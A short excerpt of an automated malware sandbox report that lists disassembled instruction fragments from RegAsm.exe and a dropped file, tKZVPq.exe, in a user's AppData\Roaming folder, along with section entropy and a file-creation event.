            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ss; mov dword ptr [esp], ebx7_2_1C8921A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C8924E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C892532
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C89253E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C89257E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C89258A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C8925CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C8925D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C892616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_1C891530 push ds; mov dword ptr [esp], ebx7_2_1C892622
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 12_2_00FE4469 push cs; retf 12_2_00FE449E
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 12_2_00FE44A3 push es; retf 12_2_00FE44A4
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 12_2_00FE4289 push es; retf 12_2_00FE4294
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 15_2_009A4289 push es; retf 15_2_009A4294
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 15_2_009A4469 push cs; retf 15_2_009A449E
            Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeCode function: 15_2_009A44A3 push es; retf 15_2_009A44A4
            Source: initial sampleStatic PE information: section name: .text entropy: 6.82320580255
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exeJump to dropped file